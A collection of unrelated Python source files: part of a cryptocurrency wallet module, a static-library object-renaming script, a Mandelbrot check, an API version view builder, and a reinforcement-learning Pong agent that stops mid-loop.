self._coin_price_cache = {}
def coin_price(self, txid, price_func, ccy, txin_value):
"""
Acquisition price of a coin.
This assumes that either all inputs are mine, or no input is mine.
"""
if txin_value is None:
return Decimal('NaN')
cache_key = "{}:{}:{}".format(str(txid), str(ccy), str(txin_value))
result = self._coin_price_cache.get(cache_key, None)
if result is not None:
return result
if self.db.get_txi_addresses(txid):
result = self.average_price(txid, price_func, ccy) * txin_value/Decimal(COIN)
self._coin_price_cache[cache_key] = result
return result
else:
fiat_value = self.get_fiat_value(txid, ccy)
if fiat_value is not None:
return fiat_value
else:
p = self.price_at_timestamp(txid, price_func)
return p * txin_value/Decimal(COIN)
def is_billing_address(self, addr):
# overridden for TrustedCoin wallets
return False
@abstractmethod
def is_watching_only(self) -> bool:
pass
def get_keystore(self) -> Optional[KeyStore]:
return self.keystore
def get_keystores(self) -> Sequence[KeyStore]:
return [self.keystore] if self.keystore else []
@profiler
def get_full_token_history(self, contract_addr=None, bind_addr=None) -> list:
hist = []
keys = []
for token_key in self.db.list_tokens():
if contract_addr and contract_addr in token_key \
or bind_addr and bind_addr in token_key \
or not bind_addr and not contract_addr:
keys.append(token_key)
for key in keys:
contract_addr, bind_addr = key.split('_')
for txid, height, log_index in self.db.get_token_history(key):
status = self.get_tx_height(txid)
height, conf, timestamp = status.height, status.conf, status.timestamp
for call_index, contract_call in enumerate(self.db.get_tx_receipt(txid)):
logs = contract_call.get('log', [])
if len(logs) > log_index:
log = logs[log_index]
# check contarct address
if contract_addr != log.get('address', ''):
self.logger.info("contract address mismatch")
continue
# check topic name
topics = log.get('topics', [])
if len(topics) < 3:
self.logger.info("not enough topics")
continue
if topics[0] != TOKEN_TRANSFER_TOPIC:
self.logger.info("topic mismatch")
continue
# check user bind address
_, hash160b = b58_address_to_hash160(bind_addr)
hash160 = bh2u(hash160b).zfill(64)
if hash160 not in topics:
self.logger.info("address mismatch")
continue
amount = int(log.get('data'), 16)
from_addr = hash160_to_p2pkh(binascii.a2b_hex(topics[1][-40:]))
to_addr = hash160_to_p2pkh(binascii.a2b_hex(topics[2][-40:]))
item = {
'from_addr': from_addr,
'to_addr': to_addr,
'bind_addr': self.db.get_token(key).bind_addr,
'amount': amount,
'token_key': key,
'txid': txid,
'height': height,
'txpos_in_block': 0,
'confirmations': conf,
'timestamp': timestamp,
'date': timestamp_to_datetime(timestamp),
'call_index': call_index,
'log_index': log_index,
}
hist.append(item)
else:
continue
return hist
@abstractmethod
def save_keystore(self):
pass
@abstractmethod
def has_seed(self) -> bool:
pass
@abstractmethod
def is_beyond_limit(self, address: str) -> bool:
pass
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def is_watching_only(self):
return self.keystore.is_watching_only()
def _update_password_for_keystore(self, old_pw, new_pw):
if self.keystore and self.keystore.may_have_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
@abstractmethod
def get_public_key(self, address: str) -> Optional[str]:
pass
def get_public_keys(self, address: str) -> Sequence[str]:
return [self.get_public_key(address)]
def get_redeem_script(self, address: str) -> Optional[str]:
txin_type = self.get_txin_type(address)
if txin_type in ('p2pkh', 'p2wpkh', 'p2pk'):
return None
if txin_type == 'p2wpkh-p2sh':
pubkey = self.get_public_key(address)
return bitcoin.p2wpkh_nested_script(pubkey)
if txin_type == 'address':
return None
raise UnknownTxinType(f'unexpected txin_type {txin_type}')
def get_witness_script(self, address: str) -> Optional[str]:
return None
class Imported_Wallet(Simple_Wallet):
# wallet made of imported addresses
wallet_type = 'imported'
txin_type = 'address'
def __init__(self, storage, *, config):
Abstract_Wallet.__init__(self, storage, config=config)
def is_watching_only(self):
return self.keystore is None
def can_import_privkey(self):
return bool(self.keystore)
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore') if self.storage.get('keystore') else None
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def can_import_address(self):
return self.is_watching_only()
def can_delete_address(self):
return True
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def is_beyond_limit(self, address):
return False
def get_fingerprint(self):
return ''
def get_addresses(self):
# note: overridden so that the history can be cleared
return self.db.get_imported_addresses()
def get_receiving_addresses(self, **kwargs):
return self.get_addresses()
def get_change_addresses(self, **kwargs):
return []
def import_addresses(self, addresses: List[str], *,
write_to_disk=True) -> Tuple[List[str], List[Tuple[str, str]]]:
good_addr = [] # type: List[str]
bad_addr = [] # type: List[Tuple[str, str]]
for address in addresses:
if not bitcoin.is_address(address):
bad_addr.append((address, _('invalid address')))
continue
if self.db.has_imported_address(address):
bad_addr.append((address, _('address already in wallet')))
continue
good_addr.append(address)
self.db.add_imported_address(address, {})
self.add_address(address)
if write_to_disk:
self.storage.write()
return good_addr, bad_addr
def import_address(self, address: str) -> str:
good_addr, bad_addr = self.import_addresses([address])
if good_addr and good_addr[0] == address:
return address
else:
raise BitcoinException(str(bad_addr[0][1]))
def delete_address(self, address):
if not self.db.has_imported_address(address):
return
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr in self.db.get_history():
details = self.get_address_history(addr)
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self.db.remove_addr_history(address)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.set_label(address, None)
self.remove_payment_request(address)
self.set_frozen_state_of_addresses([address], False)
pubkey = self.get_public_key(address)
self.db.remove_imported_address(address)
if pubkey:
# delete key iff no other address uses it (e.g. p2pkh and p2wpkh for same key)
for txin_type in bitcoin.WIF_SCRIPT_TYPES.keys():
try:
addr2 = bitcoin.pubkey_to_address(txin_type, pubkey)
except NotImplementedError:
pass
else:
if self.db.has_imported_address(addr2):
break
else:
self.keystore.delete_imported_key(pubkey)
self.save_keystore()
self.storage.write()
def is_mine(self, address) -> bool:
return self.db.has_imported_address(address)
def get_address_index(self, address) -> Optional[str]:
# returns None if address is not mine
return self.get_public_key(address)
def get_public_key(self, address) -> Optional[str]:
x = self.db.get_imported_address(address)
return x.get('pubkey') if x else None
def import_private_keys(self, keys: List[str], password: Optional[str], *,
write_to_disk=True) -> Tuple[List[str], List[Tuple[str, str]]]:
good_addr = [] # type: List[str]
bad_keys = [] # type: List[Tuple[str, str]]
for key in keys:
try:
txin_type, pubkey = self.keystore.import_privkey(key, password)
except Exception as e:
bad_keys.append((key, _('invalid private key') + f': {e}'))
continue
if txin_type not in ('p2pkh', 'p2wpkh', 'p2wpkh-p2sh'):
bad_keys.append((key, _('not implemented type') + f': {txin_type}'))
continue
addr = bitcoin.pubkey_to_address(txin_type, pubkey)
good_addr.append(addr)
self.db.add_imported_address(addr, {'type':txin_type, 'pubkey':pubkey})
self.add_address(addr)
self.save_keystore()
if write_to_disk:
self.storage.write()
return good_addr, bad_keys
def import_private_key(self, key: str, password: Optional[str]) -> str:
good_addr, bad_keys = self.import_private_keys([key], password=password)
if good_addr:
return good_addr[0]
else:
raise BitcoinException(str(bad_keys[0][1]))
def get_txin_type(self, address):
return self.db.get_imported_address(address).get('type', 'address')
def _add_input_sig_info(self, txin, address, *, only_der_suffix=True):
if not self.is_mine(address):
return
if txin.script_type in ('unknown', 'address'):
return
elif txin.script_type in ('p2pkh', 'p2wpkh', 'p2wpkh-p2sh'):
pubkey = self.get_public_key(address)
if not pubkey:
return
txin.pubkeys = [bfh(pubkey)]
else:
raise Exception(f'Unexpected script type: {txin.script_type}. '
f'Imported wallets are not implemented to handle this.')
def pubkeys_to_address(self, pubkeys):
pubkey = pubkeys[0]
for addr in self.db.get_imported_addresses(): # FIXME slow...
if self.db.get_imported_address(addr)['pubkey'] == pubkey:
return addr
return None
def decrypt_message(self, pubkey: str, message, password) -> bytes:
# this is significantly faster than the implementation in the superclass
return self.keystore.decrypt_message(pubkey, message, password)
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage, *, config):
self._ephemeral_addr_to_addr_index = {} # type: Dict[str, Sequence[int]]
Abstract_Wallet.__init__(self, storage, config=config)
self.gap_limit = storage.get('gap_limit', 20)
# generate addresses now. note that without libsecp this might block
# for a few seconds!
self.synchronize()
def has_seed(self):
return self.keystore.has_seed()
def get_addresses(self):
# note: overridden so that the history can be cleared.
# addresses are ordered based on derivation
out = self.get_receiving_addresses()
out += self.get_change_addresses()
return out
def get_receiving_addresses(self, *, slice_start=None, slice_stop=None):
return self.db.get_receiving_addresses(slice_start=slice_start, slice_stop=slice_stop)
def get_change_addresses(self, *, slice_start=None, slice_stop=None):
return self.db.get_change_addresses(slice_start=slice_start, slice_stop=slice_stop)
@profiler
def try_detecting_internal_addresses_corruption(self):
if not is_using_fast_ecc():
self.logger.info("internal address corruption test skipped due to missing libsecp256k1")
return
addresses_all = self.get_addresses()
# sample 1: first few
addresses_sample1 = addresses_all[:10]
# sample2: a few more randomly selected
addresses_rand = addresses_all[10:]
addresses_sample2 = random.sample(addresses_rand, min(len(addresses_rand), 10))
for addr_found in itertools.chain(addresses_sample1, addresses_sample2):
self.check_address(addr_found)
def check_address(self, addr):
if addr and self.is_mine(addr):
if addr != self.derive_address(*self.get_address_index(addr)):
raise InternalAddressCorruption()
def get_seed(self, password):
return self.keystore.get_seed(password)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
if value >= self.min_acceptable_gap():
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.storage.write()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
k = 0
for addr in addresses[::-1]:
if self.db.get_addr_history(addr):
break
k += 1
return k
def min_acceptable_gap(self):
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for addr in addresses[0:-k]:
if self.db.get_addr_history(addr):
n = 0
else:
n += 1
nmax = max(nmax, n)
return nmax + 1
@abstractmethod
def derive_pubkeys(self, c: int, i: int) -> Sequence[str]:
pass
def derive_address(self, for_change: int, n: int) -> str:
for_change = int(for_change)
pubkeys = self.derive_pubkeys(for_change, n)
return self.pubkeys_to_address(pubkeys)
def get_public_keys_with_deriv_info(self, address: str):
der_suffix = self.get_address_index(address)
der_suffix = [int(x) for x in der_suffix]
return {k.derive_pubkey(*der_suffix): (k, der_suffix)
for k in self.get_keystores()}
def _add_input_sig_info(self, txin, address, *, only_der_suffix=True):
self._add_txinout_derivation_info(txin, address, only_der_suffix=only_der_suffix)
def _add_txinout_derivation_info(self, txinout, address, *, only_der_suffix=True):
if not self.is_mine(address):
return
pubkey_deriv_info = self.get_public_keys_with_deriv_info(address)
txinout.pubkeys = sorted([pk for pk in list(pubkey_deriv_info)])
for pubkey in pubkey_deriv_info:
ks, der_suffix = pubkey_deriv_info[pubkey]
fp_bytes, der_full = ks.get_fp_and_derivation_to_be_used_in_partial_tx(der_suffix,
only_der_suffix=only_der_suffix)
txinout.bip32_paths[pubkey] = (fp_bytes, der_full)
def create_new_address(self, for_change: bool = False):
assert type(for_change) is bool
with self.lock:
n = self.db.num_change_addresses() if for_change else self.db.num_receiving_addresses()
address = self.derive_address(int(for_change), n)
self.db.add_change_address(address) if for_change else self.db.add_receiving_address(address)
self.add_address(address)
if for_change:
# note: if it's actually used, it will get filtered later
self._unused_change_addresses.append(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
num_addr = self.db.num_change_addresses() if for_change else self.db.num_receiving_addresses()
if num_addr < limit:
self.create_new_address(for_change)
continue
if for_change:
last_few_addresses = self.get_change_addresses(slice_start=-limit)
else:
last_few_addresses = self.get_receiving_addresses(slice_start=-limit)
if any(map(self.address_is_old, last_few_addresses)):
self.create_new_address(for_change)
else:
break
@AddressSynchronizer.with_local_height_cached
def synchronize(self):
with self.lock:
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address):
is_change, i = self.get_address_index(address)
limit = self.gap_limit_for_change if is_change else self.gap_limit
if i < limit:
return False
slice_start = max(0, i - limit)
slice_stop = max(0, i)
if is_change:
prev_addresses = self.get_change_addresses(slice_start=slice_start, slice_stop=slice_stop)
else:
prev_addresses = self.get_receiving_addresses(slice_start=slice_start, slice_stop=slice_stop)
for addr in prev_addresses:
if self.db.get_addr_history(addr):
return False
return True
def get_address_index(self, address) -> Optional[Sequence[int]]:
return self.db.get_address_index(address) or self._ephemeral_addr_to_addr_index.get(address)
def _learn_derivation_path_for_address_from_txinout(self, txinout, address):
for ks in self.get_keystores():
pubkey, der_suffix = ks.find_my_pubkey_in_txinout(txinout, only_der_suffix=True)
if der_suffix is not None:
self._ephemeral_addr_to_addr_index[address] = list(der_suffix)
return True
return False
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage, *, config):
Deterministic_Wallet.__init__(self, storage, config=config)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkeys = self.derive_pubkeys(*sequence)
return pubkeys[0]
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bip32.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return [self.keystore.derive_pubkey(c, i).hex()]
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def pubkeys_to_address(self, pubkeys):
pubkey = pubkeys[0]
return bitcoin.pubkey_to_address(self.txin_type, pubkey)
class Mobile_Wallet(Imported_Wallet):
wallet_type = 'mobile'
def __init__(self, storage: WalletStorage, *, config: SimpleConfig):
Imported_Wallet.__init__(self, storage, config=config)
self.use_change = False
self.gap_limit = 10
def can_import_address(self):
return False
def can_delete_address(self):
return False
def synchronize(self):
keys = []
addr_count = len(self.get_addresses())
for i in range(0, self.gap_limit - addr_count):
secret, compressed = self.keystore.derive_privkey([0, addr_count + i], None)
keys.append(serialize_privkey(secret, compressed, 'p2pkh', True))
self.import_private_keys(keys, None, write_to_disk=False)
class Qt_Core_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'qtcore'
def __init__(self, storage: WalletStorage, *, config: SimpleConfig):
Simple_Deterministic_Wallet.__init__(self, storage, config=config)
self.gap_limit = 100
self.gap_limit_for_change = 0
self.use_change = False
def synchronize(self):
# don't create change addres
# since core wallet doesn't distinguish address type from derivation path
with self.lock:
self.synchronize_sequence(False)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
def __init__(self, storage, *, config):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage, config=config)
def get_public_keys(self, address):
return [pk.hex() for pk in self.get_public_keys_with_deriv_info(address)]
def pubkeys_to_address(self, pubkeys):
redeem_script = self.pubkeys_to_scriptcode(pubkeys)
return bitcoin.redeem_script_to_address(self.txin_type, redeem_script)
def pubkeys_to_scriptcode(self, pubkeys: Sequence[str]) -> str:
return transaction.multisig_script(sorted(pubkeys), self.m)
def get_redeem_script(self, address):
txin_type = self.get_txin_type(address)
pubkeys = self.get_public_keys(address)
scriptcode = self.pubkeys_to_scriptcode(pubkeys)
if txin_type == 'p2sh':
return scriptcode
elif txin_type == 'p2wsh-p2sh':
return bitcoin.p2wsh_nested_script(scriptcode)
elif txin_type == 'p2wsh':
return None
raise UnknownTxinType(f'unexpected txin_type {txin_type}')
def get_witness_script(self, address):
txin_type = self.get_txin_type(address)
pubkeys = self.get_public_keys(address)
scriptcode = self.pubkeys_to_scriptcode(pubkeys)
if txin_type == 'p2sh':
return None
elif txin_type in ('p2wsh-p2sh', 'p2wsh'):
return scriptcode
raise UnknownTxinType(f'unexpected txin_type {txin_type}')
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i).hex() for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bip32.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def can_have_keystore_encryption(self):
return any([k.may_have_password() for k in self.get_keystores()])
def _update_password_for_keystore(self, old_pw, new_pw):
for name, keystore in self.keystores.items():
if keystore.may_have_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
def check_password(self, password):
for name, keystore in self.keystores.items():
if keystore.may_have_password():
keystore.check_password(password)
self.storage.check_password(password)
def get_available_storage_encryption_version(self):
# multisig wallets are not offered hw device encryption
return StorageEncryptionVersion.USER_PASSWORD
def has_seed(self):
return self.keystore.has_seed()
def is_watching_only(self):
return all([k.is_watching_only() for k in self.get_keystores()])
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
wallet_types = ['standard', 'multisig', 'imported', 'mobile', 'qtcore']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported': Imported_Wallet,
'mobile': Mobile_Wallet,
'qtcore': Qt_Core_Wallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
# former WalletFactory
class Wallet(object):
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage: WalletStorage, *, config: SimpleConfig):
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage, config=config)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise WalletFileException("Unknown wallet type: " + str(wallet_type))
def create_new_wallet(*, path, config: SimpleConfig, passphrase=None, password=None,
encrypt_file=True, seed_type=None, gap_limit=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
seed = Mnemonic('en').make_seed(seed_type)
k = keystore.from_seed(seed, passphrase)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage, config=config)
wallet.update_password(old_pw=None, new_pw=password, encrypt_storage=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
def restore_wallet_from_text(text, *, path, config: SimpleConfig,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = Imported_Wallet(storage, config=config)
addresses = text.split()
good_inputs, bad_inputs = wallet.import_addresses(addresses, write_to_disk=False)
# FIXME tell user about bad_inputs
if not good_inputs:
raise Exception("None of the given addresses can be imported")
elif keystore.is_private_key_list(text, allow_spaces_inside_key=False):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = Imported_Wallet(storage, config=config)
keys = keystore.get_private_keys(text, allow_spaces_inside_key=False)
good_inputs, bad_inputs = wallet.import_private_keys(keys, None, write_to_disk=False)
# FIXME tell user about bad_inputs
if not good_inputs:
raise Exception("None of the given privkeys can be imported")
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif keystore.is_seed(text):
k = keystore.from_seed(text, passphrase)
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage, config=config)
assert not storage.file_exists(), "file was created too soon! plaintext keys might have been written to disk"
wallet.update_password(old_pw=None, new_pw=password, encrypt_storage=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
|
the-stack_106_19068
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import subprocess
import sys
import tempfile
import os
LIPO = "lipo"
IOS_LIPO="/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/usr/bin/lipo"
if os.path.exists(IOS_LIPO):
LIPO = IOS_LIPO
def exitFailure(msg):
print("Error: " + msg)
exit(1)
def listArchs(archive):
try:
out = subprocess.check_output([LIPO, "-info", archive]).decode("utf-8")
except:
out = ""
xs = out.split(":")
if (len(xs)) != 3:
exitFailure("invalid lipo -info output")
return xs[2].strip().split()
def extractArch(archive, arch, path):
name = arch + "-" + os.path.basename(archive)
fpath = os.path.join(path, name)
try:
t = subprocess.check_call([LIPO, "-thin", arch, archive, "-output", fpath])
except:
t = 1
if t != 0:
return ""
return fpath
def extractObjs(archive, path):
try:
t = subprocess.check_call(["ar", "-x", archive], cwd=path)
except:
t = 1
if t != 0:
return False
return True
def archiveObjs(archive, path):
vext = lambda x: x[-2:] == ".o" or x[-3:] == ".o2"
files = filter(vext, os.listdir(path))
try:
t = subprocess.check_call(["libtool", "-static", "-o", archive] + files, cwd=path)
except:
t = 1
if t != 0:
return False
return True
def mergeArch(archives, outpath):
if not archives:
return
try:
t = subprocess.check_call([LIPO, "-create"] + archives + ["-output", outpath])
except:
t = 1
if t != 0:
return False
return True
if len(sys.argv) < 3:
print("Usage: {} archive objectname".format(os.path.basename(sys.argv[0])))
exit(1)
archive = sys.argv[1]
ofname = sys.argv[2]
remove = False
if (len(sys.argv) > 3):
remove = bool(int(sys.argv[3]))
root,ext = os.path.splitext(ofname)
nfname = root + "_" + ext
altofname = root + ".o2"
altnfname = root + "_.o2"
archs = listArchs(archive)
isFat = len(archs) > 1
# Create tmp dir
tdir = tempfile.mkdtemp()
marchives = []
for arch in archs:
# Extract arch from universal binary
thinar = archive
if isFat:
thinar = extractArch(archive, arch, tdir)
if not thinar:
print("Cannot extract arch " + arch)
continue
# Create tmp dir for extracted objects
arname = os.path.basename(thinar)
xdir = os.path.join(tdir, arname) + ".dir"
os.mkdir(xdir)
# Extract objects
if not extractObjs(thinar, xdir):
print("Cannot extract objects for " + arch)
continue
ofpath = os.path.join(xdir, ofname)
if remove:
os.unlink(ofpath)
else:
# Rename object
nfpath = os.path.join(xdir, nfname)
if not os.path.exists(ofpath):
# Try alternative extension
ofpath = os.path.join(xdir, altofname)
nfpath = os.path.join(xdir, altnfname)
if not os.path.exists(ofpath):
print("Cannot find object {} for arch {}".format(ofname, arch))
continue
os.rename(ofpath, nfpath)
# Archive objects
archiveObjs(thinar, xdir)
# Add archive to modified archive list
marchives.append(thinar)
if isFat:
# Merge all subarch into original file
if not mergeArch(marchives, archive):
exitFailure("Cannot update original file")
|
the-stack_106_19070
|
import sys
lines = sys.stdin.readlines()
i = 1
for line in lines:
line = list(map(float, line.strip().split()))
x = line[0]
y = line[1]
r = int(line[2])
count = 1
while count < r and x*x+y*y < 4:
tmp = x
x = x*x-y*y+line[0]
y=2*tmp*y+line[1]
count+=1
if x*x +y*y >= 4:
print(f"CASE {i}: OUT")
else:
print(f"CASE {i}: IN")
i+=1
|
the-stack_106_19073
|
# Copyright 2020 Inspur
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import os
from oslo_config import cfg
versions_opts = [
cfg.StrOpt('public_endpoint', default=None,
help="Public url to use for versions endpoint. The default "
"is None, which will use the request's host_url "
"attribute to populate the URL base. If Venus is "
"operating behind a proxy, you will want to change "
"this to represent the proxy's URL."),
]
CONF = cfg.CONF
CONF.register_opts(versions_opts)
def get_view_builder(req):
base_url = CONF.public_endpoint or req.application_url
return ViewBuilder(base_url)
class ViewBuilder(object):
def __init__(self, base_url):
"""Initialize ViewBuilder.
:param base_url: url of the root wsgi application
"""
self.base_url = base_url
def build_choices(self, VERSIONS, req):
version_objs = []
for version in VERSIONS:
version = VERSIONS[version]
version_objs.append({
"id": version['id'],
"status": version['status'],
"links": [{"rel": "self",
"href": self.generate_href(version['id'],
req.path), }, ],
"media-types": version['media-types'], })
return dict(choices=version_objs)
def build_versions(self, versions):
version_objs = []
for version in sorted(versions.keys()):
version = versions[version]
version_objs.append({
"id": version['id'],
"status": version['status'],
"updated": version['updated'],
"links": self._build_links(version), })
return dict(versions=version_objs)
def build_version(self, version):
reval = copy.deepcopy(version)
reval['links'].insert(0, {
"rel": "self",
"href": self.base_url.rstrip('/') + '/', })
return dict(version=reval)
def _build_links(self, version_data):
"""Generate a container of links that refer to the provided version."""
href = self.generate_href(version_data['id'])
links = [{'rel': 'self',
'href': href, }, ]
return links
def generate_href(self, version, path=None):
"""Create an url that refers to a specific version_number."""
if version.find('v1.') == 0:
version_number = 'v1'
else:
raise Exception("Error version of %s" % version)
if path:
path = path.strip('/')
return os.path.join(self.base_url, version_number, path)
else:
return os.path.join(self.base_url, version_number) + '/'
|
the-stack_106_19074
|
from agent_dir.agent import Agent
import scipy.misc
import numpy as np
import os
import keras
import tensorflow as tf
from keras.models import Sequential,load_model
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras.optimizers import Adam, Adamax, RMSprop
from keras import backend as K
from keras.backend.tensorflow_backend import set_session
tf.reset_default_graph()
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 1.0
set_session(tf.Session(config=config))
# Reference: https://github.com/mkturkcan/Keras-Pong/blob/master/keras_pong.py
def discount_rewards(r):
gamma=0.99
discounted_r = np.zeros_like(r)
running_add = 0
for t in reversed(range(0, r.size)):
if r[t] != 0: running_add = 0
running_add = running_add * gamma + r[t]
discounted_r[t] = running_add
return discounted_r
# Sum up losses instead of mean
def categorical_crossentropy(target, output):
_epsilon = tf.convert_to_tensor(10e-8, dtype=output.dtype.base_dtype)
output = tf.clip_by_value(output, _epsilon, 1. - _epsilon)
return tf.reduce_sum(- tf.reduce_sum(target * tf.log(output),axis=len(output.get_shape()) - 1),axis=-1)
def prepro(o,image_size=[80,80]):
"""
Call this function to preprocess RGB image to grayscale image if necessary
This preprocessing code is from
https://github.com/hiwonjoon/tf-a3c-gpu/blob/master/async_agent.py
Input:
RGB image: np.array
RGB screen of game, shape: (210, 160, 3)
Default return: np.array
Grayscale image, shape: (80, 80, 1)
"""
y = 0.2126 * o[:, :, 0] + 0.7152 * o[:, :, 1] + 0.0722 * o[:, :, 2]
y = y.astype(np.uint8)
resized = scipy.misc.imresize(y, image_size)
return np.expand_dims(resized.astype(np.float32),axis=2)
class Agent_PG(Agent):
def __init__(self, env, args):
super(Agent_PG,self).__init__(env)
self.log_path = args.save_summary_path+'pg.log'
self.model_path = args.save_network_path+'pong_model_checkpoint.h5'
self.env = env
self.actions_avialbe = env.action_space.n
if args.test_pg:
self.model = load_model(args.test_pg_model_path)
else:
self.learning_rate = args.learning_rate
# Model for Breakout #
model = Sequential()
model.add(Conv2D(32,kernel_size=(9, 9),strides=4,activation='relu',input_shape=(80,80,1), init='he_uniform'))
model.add(Conv2D(16,kernel_size=(9, 9),strides=2,activation='relu', init='he_uniform'))
model.add(Flatten())
model.add(Dense(self.actions_avialbe,activation='softmax'))
opt = Adam(lr=self.learning_rate)
model.compile(loss=categorical_crossentropy, optimizer=opt)
self.model = model
def init_game_setting(self):
self.prev_x = None
def train(self):
# Init
log = open(self.log_path,'w')
log.write('reward,avg_reward\n')
batch_size = 1
frames, prob_actions, dlogps, drs =[], [], [], []
tr_x, tr_y = [],[]
avg_reward = []
reward_sum = 0
ep_number = 0
prev_x = None
observation = self.env.reset()
# Training progress
while True:
# Get observe
cur_x = prepro(observation)
# Consider frame difference and take action.
x = cur_x - prev_x if prev_x is not None else np.zeros(cur_x.shape)
prev_x = cur_x
aprob = self.model.predict(x.reshape((1,80,80,1)), batch_size=1).flatten()
frames.append(x)
prob_actions.append(aprob)
action = np.random.choice(self.actions_avialbe, 1, p=aprob.reshape((self.actions_avialbe)))[0]
y = np.zeros([self.actions_avialbe])
y[action] = 1
observation, reward, done, info = self.env.step(action)
reward_sum += reward
drs.append(reward)
dlogps.append(np.array(y).astype('float32') - aprob)
if done:
ep_number +=1
ep_x = np.vstack(frames)
ep_dlogp = np.vstack(dlogps)
ep_reward = np.vstack(drs)
# Discount and normalize rewards
discounted_ep_reward = discount_rewards(ep_reward)
discounted_ep_reward -= np.mean(discounted_ep_reward)
discounted_ep_reward /= np.std(discounted_ep_reward)
ep_dlogp *= discounted_ep_reward
# Store current episode into training batch
tr_x.append(ep_x)
tr_y.append(ep_dlogp)
frames, dlogps, drs =[], [], []
if ep_number % batch_size == 0:
input_tr_y = prob_actions + self.learning_rate * np.squeeze(np.vstack(tr_y))
self.model.train_on_batch(np.vstack(tr_x).reshape(-1,80,80,1), input_tr_y)
